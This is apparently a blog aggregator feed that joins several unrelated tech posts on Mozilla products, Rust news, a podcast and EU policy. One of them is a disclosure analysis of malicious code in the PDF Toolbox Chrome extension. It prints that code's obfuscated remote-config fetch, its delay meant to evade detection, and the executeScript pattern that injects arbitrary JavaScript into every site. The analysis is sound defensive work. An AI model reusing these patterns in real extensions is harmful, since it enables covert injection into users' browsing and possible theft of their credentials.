It makes total sense for people to have separate email accounts. So, I wondered if there was an easier and better way to manage those emails AND protect your personal information from data breaches. I turned to Firefox Relay, a service where you use email masks instead of your true email address to prevent emails from clogging up your inbox.

Naming it is the key to keeping it organized

I recently started using Firefox Relay after hearing about the latest update which included its integration in Firefox. How it works: Whenever I visit a site and get prompted to sign up and share my email address, I can use one of my Firefox Relay email masks or create a new one. It is super easy to use. 

Last month, I signed up for new accounts that needed my email, examples like requesting I get notified when there was a high pollen count in my area and shopping for a new summer hat, so I used Firefox Relay. I can get up to five free email masks. Did you know that you could label each email mask? This allows you to easily tell who is reaching out and how they got your contact information. It’s simple: You go to the Firefox Relay dashboard to write each label associated with each mask, like shopping, information or travel. 

Plus, you can quickly go to the Firefox Relay dashboard through the Firefox Relay add-on, which gives you a shortcut. Then, you can continue to reuse those email masks. This seems like the perfect solution for people who want to organize their email accounts and have all their emails in one inbox.

Tackle more stuff with the latest Firefox Relay add-on

Recently, we added new features to the Firefox Relay add-on. You can now see it in your toolbar for every site, reusing existing masks and generating a new random mask. 

Firefox Relay Premium users can instantly create custom masks through the Firefox Relay add-on. For example, if you have a banking or financial account, you can call it banking@mozmail.com, and add a label like finances.

Whether you have a few or many email addresses, this is an easy way to manage them, and it comes from a company you can trust. Mozilla has a long-standing history of creating privacy-first products that people use and know their information is safe.

The Firefox Relay add-on is available for Firefox, Chrome and Firefox for Android. Try out the free version for yourself!

The post Here is your secret weapon to conquering your overflowing inbox  appeared first on The Mozilla Blog.

The Mozilla BlogMozilla Ventures Announces Investment in Rodeo, an App Empowering Gig Workers

Funding will grow the startup’s tech team, help make gig work more transparent

(UNITED KINGDOM | MAY 18, 2023) – Today, Mozilla Ventures is announcing a new investment and its first in the United Kingdom: Rodeo, an app that makes the gig work ecosystem more transparent for gig workers.

Rodeo helps workers access and control their data, providing critical insights like earnings over time and pay rates across different gig platforms. The app also allows its users to chat with fellow gig workers and swap valuable learnings and tips. Rodeo is used by more than 10,000 delivery drivers from Deliveroo, Uber Eats, and Just Eat.

Gig work is a rapidly-growing sector, with an estimated 4.4 million gig workers in the UK and likely more than 1 billion across the world. While gig work platforms have played a crucial role in unlocking economic opportunity, they have also come under fire for exploitative behavior. 

Mozilla Ventures is a first-of-its-kind impact venture fund to invest in startups that push the internet — and the tech industry — in a better direction. Mozilla Ventures isn’t publicizing its investment amount at this time. Rodeo has previously received investment from LocalGlobe and Seedcamp.

The funding will help expand Rodeo’s tech team and also defend users’ legal rights to access and portability of their data — two vital mechanisms for earning a living in the gig economy. 

Says Alfie Pearce-Higgins, Co-Founder of Rodeo: “Mozilla has always fought for interoperability and user agency. That’s why we are excited to work with Mozilla Ventures as we continue to empower gig workers and ensure their rights of data access and portability as enshrined in GDPR.”

Says Mohamed Nanabhay, Managing Partner of Mozilla Ventures: “Mozilla Ventures’ mission is to fuel companies pushing the tech industry in a better direction — companies that respect users, and that empower them with their data. Rodeo exemplifies these principles.”

Says Champika Fernando, who leads Mozilla’s Data Futures Lab: “The scales of the gig economy are currently tipped very much in favor of the platforms, not the workers. By addressing the way data is governed, we attempt to balance the scales and make the gig economy more equitable.”

Rodeo will join a cohort of other mission driven startups that Mozilla Ventures has invested in, including SAIL, heylogin, Lelapa AI, Themis AI, and Block Party. Mozilla Ventures launched in 2022 with an initial $35 million in funding.

Press contact: Kevin Zawacki | kevin@mozillafoundation.org

The post Mozilla Ventures Announces Investment in Rodeo, an App Empowering Gig Workers appeared first on The Mozilla Blog.

Mozilla Addons BlogdeclarativeNetRequest available in Firefox

The declarativeNetRequest (DNR) extension API is now available to all extensions starting from Firefox 113, released last week. Extensions with functionality that can be expressed in terms of declarative rules are highly encouraged to transition to the DNR API. Documentation is available at declarativeNetRequest (MDN).

DNR allows extensions to declare rules that describe how the browser should handle network requests. These rules enable Firefox to process network requests without involving the extension further. In comparison with the blocking webRequest API, this offers the following benefits:

  • Privacy: Blocking network requests without host permissions. DNR offers more privacy by design because extension code does not get direct access to the request details. Thus request blocking functionality can be offered without requiring scary host permissions. This feature is especially useful in Manifest Version 3, where host permissions are available on an opt-in basis.
  • Performance: Network requests are not blocked on extension startup and response. DNR rules are evaluated independent of extension scripts. A background page is therefore not required. This characteristic is especially important for the reliability of extensions on Android, because the Android OS may terminate the background page outside of the control of the extension and browser.
  • Cross-browser: DNR is the only extension API for handling network requests that is available across the major browsers. Other than Firefox, DNR is also supported by Safari and Chromium-based browsers such as Chrome and Edge.

Some extensions require more flexibility than DNR offers, and we are committed to supporting both the DNR and blocking webRequest APIs to ensure that Firefox users have access to the best privacy tools available.

What’s next

The DNR implementation is not final. We are working on further optimizations and additional functionality, which are tracked as dependencies of bug 1687755. Our work is not limited to Firefox; where it makes sense we try to establish cross-browser consensus in the WebExtensions Community Group (WECG), as seen at WECG issues with topic:dnr.

Are you interested in experimenting with the declarativeNetRequest API? Try out one of the examples at https://github.com/mdn/webextensions-examples/tree/main/dnr-dynamic-with-options. New to Firefox extension development? See the Test and debug section of the Extension Workshop to get started.

The post declarativeNetRequest available in Firefox appeared first on Mozilla Add-ons Community Blog.

This Week In RustThis Week in Rust 495

Hello and welcome to another issue of This Week in Rust! Rust is a programming language empowering everyone to build reliable and efficient software. This is a weekly summary of its progress and community. Want something mentioned? Tag us at @ThisWeekInRust on Twitter or @ThisWeekinRust on mastodon.social, or send us a pull request. Want to get involved? We love contributions.

This Week in Rust is openly developed on GitHub. If you find any errors in this week's issue, please submit a PR.

Updates from Rust Community

Newsletters
Project/Tooling Updates
Observations/Thoughts
Rust Walkthroughs

Crate of the Week

This week's crate is Qdrant, an open source production ready vector database/similarity search engine written in Rust. There are APIs available for Rust, Python, Javascript/Typescript and Go.

llogiq is overjoyed with his suggestion!

Please submit your suggestions and votes for next week!

Call for Participation

Always wanted to contribute to open-source projects but did not know where to start? Every week we highlight some tasks from the Rust community for you to pick and get started!

Some of these tasks may also have mentors available, visit the task page for more information.

If you are a Rust project owner and are looking for contributors, please submit tasks here.

Updates from the Rust Project

326 pull requests were merged in the last week

Rust Compiler Performance Triage

The last two weeks mostly have small changes across a number of benchmarks, no widespread large regressions or improvements.

Triage done by @simulacrum. Revision range: a368898d..3ea9ad532

6 Regressions, 3 Improvements, 4 Mixed; 2 of them in rollups 90 artifact comparisons made in total

Full report here

Approved RFCs

Changes to Rust follow the Rust RFC (request for comments) process. These are the RFCs that were approved for implementation this week:

Final Comment Period

Every week, the team announces the 'final comment period' for RFCs and key PRs which are reaching a decision. Express your opinions now.

RFCs
Tracking Issues & PRs
New and Updated RFCs
  • No New or Updated RFCs were created this week.
Call for Testing

An important step for RFC implementation is for people to experiment with the implementation and give feedback, especially before stabilization. The following RFCs would benefit from user testing before moving forward:

  • No RFCs issued a call for testing this week.

If you are a feature implementer and would like your RFC to appear on the above list, add the new call-for-testing label to your RFC along with a comment providing testing instructions and/or guidance on which aspect(s) of the feature need testing.

Upcoming Events

Rusty Events between 2023-05-17 - 2023-06-14 🦀

Virtual
Asia
Europe
North America
Oceania

If you are running a Rust event please add it to the calendar to get it mentioned here. Please remember to add a link to the event too. Email the Rust Community Team for access.

Jobs

Please see the latest Who's Hiring thread on r/rust

Quote of the Week

That's one of the great things about Rust: sometimes you can do something really dumb and get away with it.

Rik Arends at RustNL

Thanks to Josh Triplett for the suggestion!

Please submit quotes and vote for next week!

This Week in Rust is edited by: nellshamrell, llogiq, cdmistman, ericseppanen, extrawurst, andrewpollack, U007D, kolharsam, joelmarcey, mariannegoldin, bennyvasquez.

Email list hosting is sponsored by The Rust Foundation

Discuss on r/rust

Luis VillaAnnouncing the Upstream podcast

Open is 1️⃣ all over and 2️⃣ really interesting and yet 3️⃣ there’s not enough media that takes it seriously as a cultural phenomenon, growing out of software but now going well beyond that.

And so, announcement: I’m trying to fill that hole a little bit myself. Tidelift’s new Upstream podcast, which I’m hosting, will:

  1. Pull from across open, not just from software. That’s not because software is bad or uninteresting, but because it’s the best-covered and best-networked of the many opens. So I hope to help create some bridges with the podcast. Tech will definitely come up—but it’ll be in service to the people and communities building things.
  2. Bring interesting people together. I like interview-style podcasts with guests who have related but distinct interests—and the magic is their interaction. So that’s what we’ll be aiming for here. Personal goal: two guests who find each other so interesting that they schedule coffee after the recording. Happened once so far!
  3. Be, ultimately, optimistic. It’s very easy, especially for experienced open folks, to get cynical or burnt out. I hope that this podcast can talk frankly about those challenges—but also be a recharge for those who’ve forgotten why open can be so full of hope and joy for the future.

So far I’ve recorded on:

  • The near past (crypto?) and near future (machine learning?) of open, with Molly White of Web 3 Is Going Great and Stefano Maffuli of the Open Source Initiative. Get it here! (Transcripts coming soon…)
  • The joy of open. At Tidelift, we often focus on the frustrating parts of open, like maintainer burnout, so I wanted to refresh with a talk about how open can be fun. Guests are Annie Rauwerda of the amazing Depths of Wikipedia, and Sumana Harihareswara—who among many other things, has performed plays and done standup about open software. Will release this tomorrow!
  • The impact of open on engineering culture, particularly at the intersection of our massively complex technology stacks, our tools, and our people. But we are often so focused on how culture impacts tech (the other way around) that we overlook this. I brought on Kellan Elliot-McCrea of Flickr, Etsy, and Adobe, and Adam Jacob of Chef and the forthcoming System Initiative to talk about those challenges—and opportunities.
  • The relationship of open to climate and disasters. To talk about how open intersects with some of the most pressing challenges of our time, I talked with Monica Granados, who works on climate at Creative Commons, and Heather Leson, who does digital innovation — including open — at the IFRC’s Solferino Academy. I learned a ton from this one—so excited to share it out in a few weeks.

Future episodes are still in the works, but some topics I’m hoping to cover include:

  • open and regulation: what is happening in Brussels and DC, anyway? Think of this as a follow-up to Tidelift’s posts on the Cyber Resilience Act.
  • open and water: how does open’s thinking on the commons help us think about water, and vice-versa?
  • open and ethics: if we’re not technolibertarians, what are we anyway?

I’m very open to suggestions! Let me know if there’s anyone interesting I should be talking to, or topics you want to learn more about.

We’ll be announcing future episodes through the normal Places Where You Get Your Podcasts and the Tidelift website.

The Mozilla BlogPocket’s new features make it even easier to discover and organize content

Stay Up to Date and Informed On the Topics You Care About 

Pocket’s latest updates make it simpler than ever to discover and organize high-quality content that aligns with your unique interests and passions. As you may have noticed, Pocket has been rapidly evolving and growing; we’re listening to our users so that we can continue to make Pocket the go-to destination to stay informed and keep up to date with the topics you love. Starting today, Pocket is rolling out a new mobile and web experience so you can easily find the stories and topics you care about. In addition, Pocket is launching a new feature called Lists (at launch just on web, with the feature coming to Pocket mobile later this year), which will make it simpler to organize saved content. 

Pocket iOS: A new home to quickly discover and save content

For over a decade, Pocket has been a place where millions of users stay in the know without falling into a rabbit hole. Our latest iOS update makes it easier to keep up to date while on the go with personalized recommendations and more discovery content, as well as an intuitive user interface so you can quickly catch up on topics you care about.

Since we first released Pocket on iOS in 2009, a tremendous amount has changed about what makes for a compelling app experience. We always knew at some point that in order to move forward, we’d need to break new ground and start fresh. Last year, we made the decision to start over and build a new version of the iOS app with the goal of enabling quicker feature development as a primary objective. 

With the launch of the latest version of Pocket on iOS (available once you download iOS 16 on your iPhone), the redesigned app will be faster and simpler to use with a focus on a new Home experience – a starting off point for visiting everything in Pocket, from your saved content to the articles and Curated Collections we think you’ll love. We will be continuing to build on Home to provide you with different perspectives on what you’ve saved and what you’ve discovered, as well as topics like Best of the Web, Editors’ Picks, In Case You Missed It, and more.

The new redesign also includes a simplified navigation and settings screen, creating a more enjoyable user experience. The new Saves tab (formerly My List) will have an updated design, making it even more streamlined and giving Pocket users one place to access features like search, and listen, as well as to view your tagged items and favorites. We’ve also made it easier to archive items with a swipe.

Your favorite features are getting better

At the time of this release, you may have noticed that some features are missing. Fear not, friend! In a handful of cases—e.g. the feature that allows you to highlight articles—the Pocket product team is working hard to bring back the missing features to continue enhancing our user experience. 

In a few select cases, we did remove a feature from the app permanently in order to make room for new or improved experiences. For example: the feature that allowed you to make recommendations to other Pocket users to make way for the new Lists feature. Letting users share content is an important part of what makes Pocket useful, so we are actively investing on improving this experience. 

At the end of the day, all this means is that your favorite features just became a little faster and easier to use! 

What’s next for Pocket on iOS? 

Moving forward, Pocket on iOS will be updated every two weeks. In the next few months, we’ll be bringing back the ability to create and view highlights on your saved articles, improving the quality of the articles that we recommend to you, and bringing additional functionality to our Listen feature, through which you can listen to your saved articles.

Pocket on the Web: Create your own Pocket Lists

Starting today, users in the U.S. can create private lists on the web version of Pocket, where they can collect their saved articles, videos, and websites. Users will be able to create and manage multiple lists on their Pocket web experience, give them a title and description, add or remove items, and easily switch between lists as they browse their saved content. Pocket Lists make it easier to find and consume content that matters most.

“The new Pocket Lists feature will offer users a more intuitive way to organize their content, and unlike tags, which can sometimes be difficult to manage, Pocket Lists provide a more structured approach to categorizing content,” said Kait Gaiss, Pocket’s head of product management. “We’ve received many requests from Pocket users who wished to create Lists to organize their content, so we are excited to release this new feature to meet their needs.” 

Some examples of Lists you can make include: 

  • keeping track of your favorite recipes
  • saving content like videos and memes that bring you joy
  • building a travel guide for your upcoming trip (with history, culture and sites to visit)
  • creating a how-to guide for DIY projects around your home 
  • tracking articles on career planning that you want to visit again and again

How to create your own Lists on Pocket for Web

To create a new list in Pocket, follow these steps:

  1. Click Saves at the top of the screen.
  2. Click the “+” sign next to Lists in the menu on the left-hand side of the screen (or click the Create List button in the top-right side of the screen). 
  3. In the panel that appears, give your new list a name and a description.
  4. Click the Create List button to finish.

All of your lists will appear under All Lists in the panel to the left. 

Add items to your list

  1. Click on Saves in the top menu to view all of your saved items
  2. Locate the item you want to add to a list and click the three dots at the bottom right of the card
  1. Click  Add to list from the available options.
  2. The Add to List panel will open next. Select a list from the drop-down menu.
  3. Click Save to List to add the item to your selected list.

Manage your lists

To manage your lists Click All Lists in the menu to the left. All your lists will be displayed here.

To remove an item from a list

  1. Click All Lists in the right-hand panel to view all of your lists
  2. Select the list that contains the item you wish to remove
  3. Find the item you want to remove from the list and click Remove at the bottom right

Delete a list

  1. Click All Lists in the  menu on the left-hand side of the screen to view all of your lists.
  2. Locate the list you want to delete and click the Delete button

Click Delete again in the prompt that appears next. Deleting a list cannot be undone

While the initial launch is just for U.S.-based users and on the web version of Pocket, we will open up to Pocket users worldwide this summer. Coming soon, Pocket users will be able to add multiple items to a List at once, as well as adding notes to the items in their Lists (a feature that has been requested by many Pocket users so they can remember why they added that item to their List!). And later this year, Pocket users will be able to publish and share their Lists with their family and friends, and, as mentioned previously, while it is only available on the web at launch, the Lists feature will also roll out in Pocket on mobile. 

Pocket Android: Reading your favorite articles just got easier

We’re releasing new features for Reader that will help you enjoy your Pocket experience more!

  • Love reading articles that you Pocketed from your favorite news sites, but hate having to log in each time you try to access those articles? Say no more! Pocket will now save your login info so that you don’t need to sign in each time you go to a website to see content you’ve saved when you visit those sites through the Pocket app.
  • The ability to use the Previous-Next buttons in Article View will make it easier for Pocket users to continue enjoying their saved content without having to return to your Saves list. 
  • The ability to use the Previous-Next buttons for all your saves regardless of viewing in Pocket or going to the original site will make it easier for Pocket users to continue enjoying their saved content without having to return to your Saves list.
  • Reading articles on an Android tablet is now more efficient with text that is optimized for wide screens.

All of these updates are a culmination of Pocket’s Android updates, which started in January of this year.

What’s ahead for the rest of 2023

In the coming weeks and months, we’ll have more news and updates to share from Pocket. If you’re interested in staying in the know, join our mailing list!

Save and discover the best articles, stories and videos on the web

Get Pocket

The post Pocket’s new features make it even easier to discover and organize content appeared first on The Mozilla Blog.

Wladimir PalantMalicious code in PDF Toolbox extension

The PDF Toolbox extension for Google Chrome has more than 2 million users and an average rating of 4,2 in the Chrome Web Store. So I was rather surprised to discover obfuscated code in it that has apparently gone unnoticed for at least a year.

The code has been made to look like a legitimate extension API wrapper, merely with some convoluted logic on top. It takes a closer look to recognize unexpected functionality here, and quite some more effort to understand what it is doing.

This code allows serasearchtop[.]com website to inject arbitrary JavaScript code into all websites you visit. While it is impossible for me to tell what this is being used for, the most likely use is injecting ads. More nefarious uses are also possible however.

Update (2023-05-31): As I describe in a follow-up article, this extension isn’t alone. So far I found 18 malicious browser extensions using similar code with a combined user count of 55 million. It’s also clear now that these extensions are at the very least being used to redirect search pages.

What PDF Toolbox does

The functionality of the PDF Toolbox extension is mostly simple. You click the extension icon and get your options:

An extension icon showing a Swiss army knife with its pop-up open. The pop-up contains the PDF Toolbox title following by four options: Convert office documents, Merge two PDF files, Append image to PDF file, Download Opened PDFs (0 PDFs opened in your tabs)

Clicking any of the options opens a new browser tab with the actual functionality. Here you can select the files and do something with them. Most operations are done locally using the pdf-lib module. Only converting Office documents will upload the file to a web server.

And a regular website could do all of this in exactly the same way. In fact, plenty of such websites already exist. So I suspect that the option to download PDFs only exists to justify both this being a browser extension and requiring wide-reaching privileges.

See, in order to check all your tabs for downloadable PDFs this extension requires access to each and every website. A much more obvious extension design would have been: don’t bother with all tabs, check only the current tab when the extension icon is clicked. After all, people rarely trigger an extension because of some long forgotten tab from a week ago. But that would have been doable with a far less powerful activeTab permission.

While Chrome Web Store requires extension developers not to declare unnecessary permissions, this policy doesn’t seem to be consistently enforced. This extension also requests access to detailed browser tabs information and downloads, but it doesn’t use either.

The “config” file

So all of the extension functionality is contained in the browser action pop-up and the page opening in a new tab. But it still has a background page which, from the look of it, doesn’t do much: it runs Google Analytics and sets the welcome and uninstall page.

This is standard functionality found in some other extensions as well. It seems to be part of the monetization policy: the pages come from ladnet.co and display ads below the actual message, prompting you to install some other browser extensions.

The module called then-chrome is unusual however. It in turn loads a module named api, and the whole thing looks like wrapping the extension APIs similarly to Mozilla’s WebExtension API polyfill. Which would have been slightly more convincing if there were anything actually using the result.

The api module contains the following code:

var Iv = TL ?
  "http" + ff + "//s" + qc + "a" + fx + "ar" + document.location.protocol.substring(0, 2) +
    (ad ? "to" : ad) + so + "c" + document.location.protocol.substring(3, 5) + "/cf" + Sr :
  qB;
let oe = Iv;
oe += bo + (Ua + "fg.") + qB + document.location.protocol.substring(14, 16);

Weird, right? There are all these inline conditionals that don’t do anything other than obfuscating the logic. TL gets document assigned to it, ad gets chrome.runtime as its value – there is no way any of these might be missing.

This is in fact a very convoluted way of constructing a constant string: https://serasearchtop.com/cfg/bahogceckgcanpcoabcdgmoidngedmfo/cfg.json. As the next step the extension calls window.fetch() in order to download this file:

const ax = await window["fet" + document.location.protocol.substring(0, 2)](oe);
if (ax.ok)
{
  const rd = await ax.json();
  (0, af.wrapObject)(chrome, rd)
}

Calling wrapObject with chrome as first parameter makes the impression that this were some harmless configuration data used to wrap extension APIs. The fact that the developers spent so much effort to obfuscate the address and the downloading tells otherwise however.

Detection prevention

Before I start going through the “wrapper,” there is another piece of logic worth mentioning. Somebody probably thought that the extension making a request to serasearchtop[.]com immediately upon installation would draw suspicions. While it isn’t clear what this domain does or who is behind it, it managed to get onto a bunch of anti-tracking blocking lists.

So rather than making the request immediately, the extension waits 24 hours. This logic is also obfuscated. It looks like this (slightly cleaned up):

const rd = localStorage;
const qJ = "cfg";
const oe = Date.now();
var ax = rd.getItem(qJ);
const PB = 9993592013;
if (ax)
{
  const rd = PB - ax
  const qJ = oe - rd;
  if (qJ < (TL ? 0 : rd) || qJ > (ad ? 87217164 : TC))
  {
    // Download logic here
  }
}
else
{
  ax = PB - oe;
  rd.setItem(qJ, ax)
}

You can again ignore the inline conditionals: both conditions are always true. The PB constant is only being used to somewhat mess up the timestamp when it is being stored in localStorage.cfg. But qJ becomes the number of milliseconds since the first extension start. And 87217164 is slightly more than the number of milliseconds in 24 hours.

So one only has to change the timestamp in localStorage.cfg for the request to the “configuration” file to happen. For me, only an empty JSON file is being returned however. I suspect that this is another detection prevention mechanism on the server side. There is a cookie being set, so it will likely take some time for me to get a real response here. Maybe there is also some geo-blocking here or other conditions.

The “wrapper”

The wrapper module is where the config processing happens. The logic is again unnecessarily convoluted but it expects a config file like this:

{
  "something2.func2": "JSON-stringified parameters",
  "something1.func1": "this is ignored"
}

The code relies on Object.entries() implementation in Chrome listing object entries in a particular order. It will take the global scope of the extension’s background page and look up the functions listed in the keys. And it will call them in a very specific way:

something1.func1(x =>
{
  something2.func2(x, params2, () =>
  {
    chrome.runtime.lastError;
  });
});

Now I haven’t seen any proper “config” data, so I don’t really know what this is supposed to do. But the callbacks passed in and chrome.runtime.lastError indicate that something1.func1 and something2.func2 are meant to be extension API methods. And given what the extension has access to, it’s either tabs, windows or downloads API.

It took me some time to find a parameter-less API that would call the callback with a value that could be passed to another API call. In the end I realized that the first call is adding a listener. Most likely, something1.func1 is chrome.tabs.onUpdated.addListener. This also explains why chrome.runtime.lastError isn’t being checked for the first call, it is unnecessary when adding a listener.

The tab update listener will be called regularly, and its first parameter is the tab ID. Which can be passed to a number of extension APIs. Given that there is no further logic here, only one call makes sense: chrome.tabs.executeScript. So the wrapper is meant to run code like this:

chrome.tabs.onUpdated.addListener(tabId =>
{
  chrome.tabs.executeScript(tabId, {code: "arbitrary JavaScript code"}, () =>
  {
    chrome.runtime.lastError;
  });
});

Effectively, the “config” file downloaded from serasearchtop[.]com can give the extension arbitrary JavaScript code that will be injected into every web page being opened.

What’s the goal?

As I’ve never seen the code being injected, we are now entering the realm of speculations. Most likely, the goal of this code is monetizing the browser extension in ways that are prohibited by the Chrome Web Store policies. Which usually means: injecting ads into websites.

One would expect users to notice however. With the latest PDF Toolbox version being published in January 2022, this has been going on for more than a year. It might have been even longer if previous versions contained this malicious code as well. Yet not one of the two million users complains in an extension review about ads. I can see a number of explanations for that:

  • The user numbers have been artificially inflated and the real user count is far lower than two million.
  • The functionality is not active, the server gives everyone an empty config file.
  • The functionality is only active in some regions, particularly those where people are unlikely to come complain in the Chrome Web Store.
  • The code is not injecting ads but rather doing something less obvious.

Concerning the latest bullet point, I see a number of options. A less visible monetization alternative would be injecting cryptocurrency mining code into websites. Maybe it’s that.

Or maybe it’s something that users have almost no chance of detecting: data collection. Maybe the injected code is collecting browsing profiles. Or something more nefarious: it could be collecting online banking credentials and credit card numbers as these are being entered into websites.

Yes, these are pure speculations. It could be anything.

David HumphreyThinking about Context

I've written recently about my work on ChatCraft.org.  I've been doing a bunch of refactoring and new feature work, and things are in a pretty good state.  It mostly works the way I'd expect now.  Taras and Steven have filed a bunch of good ideas related to sharing, saving, and forking chats, and I've been exploring using SQLite Wasm for offline storage. But over the weekend I was thinking about something else.  Not a feature exactly, but a way of thinking about the linear flow of a chat.  The more I've worked with ChatCraft, the more I've learned about this form of dialog.  Because a number of separate features flow from this, I thought I'd start by sketching things out in my blog instead of git.

A Chat

The (current) unit of AI interaction is the chat.  A chat, in contrast to a conversation, dialog, debate, or any of the other ways one might describe "talking," is a kind of informal talk between friends.  The word choice also gives a nod to the modern, technical meaning of "chat" as found in "chat app" or "chat online." When we "chat," with do so without formality, often in short bursts.

What informal chats depend upon is an existing, shared (i.e., external) context between the speakers.  I want to chat with you about details for some event we're planning, or to clarify something you said on the phone, or to quickly ask for help.  I can duck in and out of the conversation without ceremony, because this "chat" does not represent anything serious or lasting.  That is, the relationship of the participants is independent of this interaction--we're just chatting.

Something similar is at work when I'm talking to an AI.  Most of what I'm saying is not present in the chat.  Maybe I want to know the specific syntax for performing an operation in a programming language.  I'm not interested in learning the language, talking about why the syntax evolved the way that it did, debating other approaches, etc.  I might write only 2 or 3 sentences, but everything I don't write is also necessary for the interaction to work.

Just as with a friend, I have to signal to an AI the type of thing I'm after.  Lots has been written about prompting an AI, but increasingly I'm becoming aware of the need to evolve that prompt over a series of messages, to refine the idea (both my own and the AI's), and work toward an understanding.  It's less about coming up with the right magical incantation to conjure an idea into existence, and more like a conversation over coffee with a colleague.  So there's always going to be an enormous, shared context that we generally won't discuss; but in addition to this we necessarily need to build a smaller, more immediate context within the discussion itself.

My interest in AI doesn't include "training LLMs from scratch," which is to say, I'm not concerned with the larger, shared context.  It's fundamentally important, but beyond me.  However, I am fascinated by this more intimate, smaller context that develops within the conversation itself.

Context in ChatCraft

A chat in ChatCraft looks like this:

<figcaption>Typical ChatCraft chat</figcaption>

To begin, we've got the usual back-and-forth you'd expect.  Beneath the UI, we actually have the following:

  1. A system prompt, helping to define the way our assistant will behave.
  2. AI message, the first one we seed
  3. User message
  4. AI message,
  5. Repeat...

Lots of apps need to hide their system prompt (it's hard to do well!), but ours is easy to find, since ChatCraft is open source:

You are ChatCraft.org, a web-based, expert programming AI.
You help programmers learn, experiment, and be more creative with code.
Respond in GitHub flavored Markdown. Format ALL lines of code to 80
characters or fewer. Use Mermaid diagrams when discussing visual topics.

When the user enables "Just some me the code" mode, we amend it with this:

However, when responding with code, ONLY return the code and NOTHING else (i.e., don't explain ANYTHING).

By the time you read this, it will probably have changed again, but this is what it was when I wrote this post.

The AI/Human Message pairs are kind of an obvious construct, but after using this paradigm for a while, new things are occurring to me.

There is Only One Author

When I'm chatting with a friend, there are two (or more) people involved.  An effective and emotionally safe interaction will involve all parties getting a chance to speak and be heard.  Furthermore, it's important that neither party manipulate or intentionally misrepresent what the other is saying.

These ideas are so obvious that I almost don't need to mention them; and it makes sense that they would find their way into how we model interactions with an AI as well.

In terms of manipulation, much has been said about AI hallucinations and how you have to be careful not to swallow whole any text that an AI provides.  This is true.  But I haven't read as much about people tinkering in the other direction.

When I first started working on ChatCraft, Taras had already added a very important feature: being able to remove a message from the current chat.  If the AI gets off on some tangent that I don't want, I can delete a response and try again.  It doesn't even have to be the last message I delete.

This seemingly simple idea has some profound implications.  By adding the ability to remove a message from anywhere in the current context, we establish the fact that only one party is involved: I am at once the author, editor, and reader.  There is no one else in the chat.

This realization becomes a foundation for building other interesting things. Let me give you a simple example.  ChatCraft takes advantage of GPT's ability to create Mermaid diagrams in Markdown, and lets us render visual graphics:

<figcaption>Example Mermaid Diagram in ChatCraft</figcaption>

It can create some really complex diagrams, which makes understanding difficult relationships much easier.  But it also makes silly mistakes:

<figcaption>Syntax Errors in Pie Chart Diagrams</figcaption>

In these examples, our inline renderer has blown up trying to render a diagrams with syntax errors (i.e., the numeric values shouldn't include %, per the docs).  For a while, I was embracing the typical notion of what a "chat" should be and pointing out the error.  "My apologies, you're right..." would come the reply, and the error gets fixed.

But when I'm the only author in the chat, I should be able to manipulate and edit any response, be it mine or the AI's.  Fixing those graphs would be as simple as adding an EDIT button I can click to fix anything in an AI's response, thus unlocking my follow-up messages:

<figcaption>Fixed Pie Diagram</figcaption>

Mixing Multiple AI Models

Another idea that becomes possible is swapping out the AI for one or more of the messages in the chat.  This would be unthinkable in a real chat, or even when chatting to an AI using a commercial product (why would anyone let me bring their competitor's AI into this interaction?).  But in an open source app, I should be able to move effortlessly between chatting with ChatGPT, GPT-4, Claude, Bard, etc.  I owe no fielty to an API provider.  I should be able to pull and mix responses from various AI backends, leveraging different AI models where appropriate for the current circumstance.

Speaking of different models and context, I've also been thinking about context windows.  While chatting with ChatGPT in ChatCraft, I often hit the 4K token limit (it's 8K with GPT-4).  Rarely am I asking a question and getting an answer.  More often than not, it's a slow evolution of an idea or piece of code.  Up til now, that's meant I have to start manually pruning messages out of the chat to continue on.  But I've realized that I could implement a sliding context window, which would allow me to chat indefinitely with a ~4K context window that includes the most recent messages.

Working with Data

Part of what takes me over the 4K/8K limit is including blocks of code.  I usually write to ChatCraft the way I'd discuss something in GitHub: Markdown with lots of code blocks.  I even find myself copy/pasting 3 or four whole files into a single message.  It's made me realize that I need to be able to "upload" or "attach" files directly into the chat.  I want to talk about a piece of code, so let me drag it into the chat and have it get included as part of the context.  If I want to deal with it as piece of text, I can still copy/paste it into my message; but if all I want is for it to ride along with the rest of what I'm discussing, I should be able to add it easily.

The same is true for other kinds of data.  ChatCraft can already render HTML, to build things like charts:

<figcaption>Rendering a Chart.js line chart in ChatCraft</figcaption>

Maybe I want to draw a graph using a bunch of CSV data.  What if I could drag or attach that data into the chat just like I mentioned above with code?  "I need a line graph of this CSV data..."

Conclusion

I want to build a bunch of this, but thought I'd start by writing about it.  Using ChatCraft to build ChatCraft has evolved my understanding of what I want in an AI, and it's fun to be able to prototype and explore your own ideas without having to wait on features (or even access!) from big AI providers.

Mozilla Open Policy & Advocacy BlogMozilla weighs in on the EU Cyber Resilience Act

Cybersecurity incidents and attacks have been on the rise in the past years. Enhancing security and trust is more relevant than ever to protect users online. Legislators worldwide have been contemplating new rules to ensure that hardware and software products become more secure, with the latest example being the EU’s Cyber Resilience Act. Below we present our concrete recommendations on how legislators can ensure that the CRA can effectively achieve its objectives.

In recent years, the European Commission has taken concrete steps to boost its cyber security capabilities across Europe. After successfully adopting the NISD2 and the EU Cybersecurity Act, the last missing piece of the puzzle is the Cyber Resilience Act (CRA). This latest proposal aims to bolster the security capabilities of hardware and software products in the EU market while ensuring a more coherent framework that facilities compliance.

At Mozilla, we believe that individuals’ security and privacy online and a safe Internet overall can only be guaranteed when all actors comply with high cybersecurity standards. We are constantly investing in the security of our products, the internet, and its underlying infrastructure. Therefore, we welcome and support the overarching goals of the CRA. To realize its full potential and achieve its objectives, we call on legislators to consider the following recommendations during the upcoming legislative deliberations:

  • Clarify ‘commercial activity’ for open-source software – free and open-source software promotes the development of the internet as a public resource. Many open-source projects (like Mozilla’s products) have commercial characteristics (i.e., provided in exchange for a price) and, therefore, should abide by the CRA rules. However, there are several open-source projects that will be unintentionally captured by the CRA obligations. For example, merely charging a small fee for the technical support of the freely provided software to fund the financial existence of such projects should not be considered a commercial activity.
  • Align the proposal with existing EU cybersecurity legislation – given the number of legislative initiatives the EU’s cybersecurity package has introduced in the past years, legislators should ensure that obligations around reporting incidents, timeframes, and competent authorities remain aligned across different laws. Such discrepancies can lead to confusion at a time when the efficiency of reporting cybersecurity incidents is paramount.
  • Refrain from disclosing unmitigated vulnerabilities – Mozilla has long advocated for reforms to how governments handle vulnerabilities. Stockpiling vulnerabilities can result in abusive use from governments themselves but also from malicious actors. Policies that mandate the disclosure of unpatched vulnerabilities should be scrutinized carefully. Even if well-intended, we believe that sharing such vulnerabilities with governments creates more risk than it solves.

